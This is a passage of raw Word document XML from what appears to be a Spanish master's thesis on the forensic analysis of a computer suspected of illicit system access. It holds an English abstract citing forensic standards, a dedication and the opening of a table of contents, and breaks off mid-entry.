            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4204825F" w14:textId="2FCF6F50" w:rsidR="00422BCC" w:rsidRPr="00F149F6" w:rsidRDefault="00422BCC" w:rsidP="00422BCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F149F6">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">The objective of this Master's Thesis is to </w:t>
            </w:r>
            <w:r w:rsidR="005F4CA6" w:rsidRPr="00F149F6">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>conduct</w:t>
            </w:r>
            <w:r w:rsidRPr="00F149F6">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve"> a forensic analysis of a computer that is suspected of having accessed the systems illicitly. It will be checked whether they have really accessed, as well as the method they have used. On the other hand, a report will be prepared with the consequences that arise from said access, and it will also be verified if there has been any extraction of information.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DC3C1E4" w14:textId="1C9754E8" w:rsidR="007536BF" w:rsidRPr="00F149F6" w:rsidRDefault="00422BCC" w:rsidP="00422BCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F149F6">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">Lastly, and not least, for this work, the standards that currently exist will be </w:t>
            </w:r>
            <w:r w:rsidR="008A7329" w:rsidRPr="00F149F6">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>considered</w:t>
            </w:r>
            <w:r w:rsidRPr="00F149F6">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>, such as the ISO</w:t>
            </w:r>
            <w:r w:rsidR="00D16863">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D16863">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> XE "</w:instrText>
            </w:r>
            <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
              <w:instrText>ISO (International Organization for Standardization): Organización que desarrolla y publica estándares internacionales.</w:instrText>
            </w:r>
            <w:r w:rsidR="00D16863">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
              <w:instrText>"</w:instrText>
            </w:r>
            <w:r w:rsidR="00D16863">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> </w:instrText>
            </w:r>
            <w:r w:rsidR="00D16863">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r w:rsidRPr="00F149F6">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve"> 27037 standard, the RFC</w:t>
            </w:r>
            <w:r w:rsidR="00D16863">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D16863">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> XE "</w:instrText>
            </w:r>
            <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
              <w:instrText>RFC (Request for Comments): Documentos que describen métodos, comportamientos, investigaciones o innovaciones aplicables a la operación de Internet y sistemas conectados.</w:instrText>
            </w:r>
            <w:r w:rsidR="00D16863">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
              <w:instrText>"</w:instrText>
            </w:r>
            <w:r w:rsidR="00D16863">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> </w:instrText>
            </w:r>
            <w:r w:rsidR="00D16863">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r w:rsidRPr="00F149F6">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve"> 3227 or the standards of the Spanish Association for Standardization UNE 71505 and UNE 71506.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="68DD1079" w14:textId="77777777" w:rsidR="00D41EF4" w:rsidRPr="00490E1A" w:rsidRDefault="00D41EF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:sectPr w:rsidR="00D41EF4" w:rsidRPr="00490E1A" w:rsidSect="00B93CA3">
          <w:footerReference w:type="default" r:id="rId17"/>
          <w:footerReference w:type="first" r:id="rId18"/>
          <w:pgSz w:w="11907" w:h="16840" w:code="9"/>
          <w:pgMar w:top="1418" w:right="1701" w:bottom="1418" w:left="1701" w:header="709" w:footer="709" w:gutter="0"/>
          <w:pgNumType w:fmt="lowerRoman" w:start="1"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24C417D3" w14:textId="77777777" w:rsidR="00490E1A" w:rsidRPr="00F149F6" w:rsidRDefault="00490E1A" w:rsidP="00490E1A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BF20985" w14:textId="77777777" w:rsidR="00490E1A" w:rsidRPr="00F149F6" w:rsidRDefault="00490E1A" w:rsidP="00490E1A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CDDC340" w14:textId="77777777" w:rsidR="00490E1A" w:rsidRPr="00F149F6" w:rsidRDefault="00490E1A" w:rsidP="00490E1A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D1726C8" w14:textId="77777777" w:rsidR="00490E1A" w:rsidRPr="00F149F6" w:rsidRDefault="00490E1A" w:rsidP="00490E1A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="007BF2C7" w14:textId="77777777" w:rsidR="00490E1A" w:rsidRPr="00F149F6" w:rsidRDefault="00490E1A" w:rsidP="00490E1A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3936372C" w14:textId="77777777" w:rsidR="00490E1A" w:rsidRPr="00F149F6" w:rsidRDefault="00490E1A" w:rsidP="00490E1A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F5B3A5B" w14:textId="77777777" w:rsidR="00490E1A" w:rsidRPr="00F149F6" w:rsidRDefault="00490E1A" w:rsidP="00490E1A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="530A43CF" w14:textId="77777777" w:rsidR="00490E1A" w:rsidRPr="00F149F6" w:rsidRDefault="00490E1A" w:rsidP="00490E1A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41DFE0D2" w14:textId="77777777" w:rsidR="00490E1A" w:rsidRPr="00F149F6" w:rsidRDefault="00490E1A" w:rsidP="00490E1A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F3F3082" w14:textId="77777777" w:rsidR="00490E1A" w:rsidRPr="00F149F6" w:rsidRDefault="00490E1A" w:rsidP="00490E1A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DBE99C9" w14:textId="77777777" w:rsidR="00490E1A" w:rsidRPr="00F149F6" w:rsidRDefault="00490E1A" w:rsidP="00490E1A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4135599D" w14:textId="77777777" w:rsidR="00490E1A" w:rsidRPr="00F149F6" w:rsidRDefault="00490E1A" w:rsidP="00490E1A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43E6E765" w14:textId="241E8086" w:rsidR="00490E1A" w:rsidRPr="00F149F6" w:rsidRDefault="00490E1A" w:rsidP="00490E1A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F149F6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>A mi esposa e hija, acompañantes en todo momento de esta aventura académica.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C47EE6D" w14:textId="77777777" w:rsidR="00490E1A" w:rsidRPr="00F149F6" w:rsidRDefault="00490E1A" w:rsidP="00490E1A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4998135F" w14:textId="60989A49" w:rsidR="00490E1A" w:rsidRPr="00F149F6" w:rsidRDefault="00490E1A" w:rsidP="00490E1A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F149F6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">A mis compañeros de trabajo, Juanma, Luisma y Borja, que saben de </w:t>
      </w:r>
      <w:r w:rsidR="008A7329" w:rsidRPr="00F149F6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>qué</w:t>
      </w:r>
      <w:r w:rsidRPr="00F149F6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> estos tres años que llevo realizando este master y han conocido todos los derroteros que me ha llevado este camino.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789FEE02" w14:textId="77777777" w:rsidR="00490E1A" w:rsidRPr="00490E1A" w:rsidRDefault="00490E1A" w:rsidP="00490E1A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:sectPr w:rsidR="00490E1A" w:rsidRPr="00490E1A" w:rsidSect="00B93CA3">
          <w:footerReference w:type="default" r:id="rId19"/>
          <w:footerReference w:type="first" r:id="rId20"/>
          <w:pgSz w:w="11907" w:h="16840" w:code="9"/>
          <w:pgMar w:top="1418" w:right="1701" w:bottom="1418" w:left="1701" w:header="709" w:footer="709" w:gutter="0"/>
          <w:pgNumType w:fmt="lowerRoman" w:start="1"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B46694F" w14:textId="4DAB1376" w:rsidR="007A4E95" w:rsidRPr="00490E1A" w:rsidRDefault="00A62A17" w:rsidP="00490E1A">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00490E1A">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Índice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43474E88" w14:textId="77777777" w:rsidR="00A45771" w:rsidRPr="00490E1A" w:rsidRDefault="00A45771" w:rsidP="00862E9E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16948F21" w14:textId="2BEDF5EA" w:rsidR="00C4245F" w:rsidRDefault="00B83DD2">
      <w:pPr>
        <w:pStyle w:val="TDC1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:szCs w:val="22"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7567F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00F7567F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00F7567F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc155782495" w:history="1">
        <w:r w:rsidR="00C4245F" w:rsidRPr="000F0E21">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>1.</w:t>
        </w:r>
        <w:r w:rsidR="00C4245F">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:kern w:val="2"/>
            <w:szCs w:val="22"/>
            <w14:ligatures w14:val="standardContextual"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00C4245F" w:rsidRPr="000F0E21">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:eastAsia="Arial"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Plan de trabajo</w:t>
        </w:r>
        <w:r w:rsidR="00C4245F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00C4245F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00C4245F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782495 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00C4245F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00C4245F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r w:rsidR="00C4245F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5C43B05D" w14:textId="34A77267" w:rsidR="00C4245F" w:rsidRDefault="00C4245F">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782496" w:history="1">
        <w:r w:rsidRPr="000F0E21">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>1.1.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:kern w:val="2"/>
            <w:szCs w:val="22"/>
            <w14:ligatures w14:val="standardContextual"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="000F0E21">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>Problema por resolver.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782496 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2BD1D5A6" w14:textId="2AC788CF" w:rsidR="00C4245F" w:rsidRDefault="00C4245F">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782497" w:history="1">
        <w:r w:rsidRPr="000F0E21">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>1.2.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:kern w:val="2"/>
            <w:szCs w:val="22"/>
            <w14:ligatures w14:val="standardContextual"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="000F0E21">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>Objetivos.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782497 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2BFE106E" w14:textId="55E8D8D4" w:rsidR="00C4245F" w:rsidRDefault="00C4245F">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782498" w:history="1">
        <w:r w:rsidRPr="000F0E21">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>1.3.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:kern w:val="2"/>
            <w:szCs w:val="22"/>
            <w14:ligatures w14:val="standardContextual"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="000F0E21">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>Metodologías.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782498 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4CC91E9B" w14:textId="1EA1CFE7" w:rsidR="00C4245F" w:rsidRDefault="00C4245F">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782499" w:history="1">
        <w:r w:rsidRPr="000F0E21">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>1.4.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:kern w:val="2"/>
            <w:szCs w:val="22"/>
            <w14:ligatures w14:val="standardContextual"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="000F0E21">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Descripción del entorno de trabajo.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782499 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5AA8078F" w14:textId="789AC10C" w:rsidR="00C4245F" w:rsidRDefault="00C4245F">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782500" w:history="1">
        <w:r w:rsidRPr="000F0E21">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>1.5.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:kern w:val="2"/>
            <w:szCs w:val="22"/>
            <w14:ligatures w14:val="standardContextual"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="000F0E21">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Listado de tareas.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782500 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
